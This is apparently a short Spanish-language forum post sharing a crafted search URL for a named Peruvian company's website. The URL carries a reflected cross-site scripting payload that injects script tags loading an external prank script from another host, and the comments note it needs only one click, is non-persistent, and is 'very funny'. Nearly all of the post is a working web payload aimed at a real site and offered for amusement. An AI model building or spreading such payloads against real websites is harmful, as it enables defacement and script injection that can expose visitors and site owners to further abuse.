http://www.petroperu.com.pe/portalweb/Buscador.asp?q=http://www.petroperu.com.pe/portalweb/Buscador.asp?q=%3Cscript%20language=%22javascript%22%3E%20nd_mode=%22meteor%22;%20nd_dest=%22massive%22;%20nd_control=%22on%22;%20nd_sound=%22on%22;%20nd_vAlign=%22bottom%22;%20nd_hAlign=%22center%22;%20nd_vMargin=%2210%22;%20nd_hMargin=%2210%22;%20nd_target=%22_self%22;%20%3C/script%3E%20%3Cscript%20language=%22javascript%22%20src=%22http://www.netdisaster.com/js/mynd.js%22%3E%3C/script%3E
Solo basta con dar un clip
Pero el XSS es no persistente
El subforo con vulnerabilidades a nivel web está arriba.
divertidisimo :D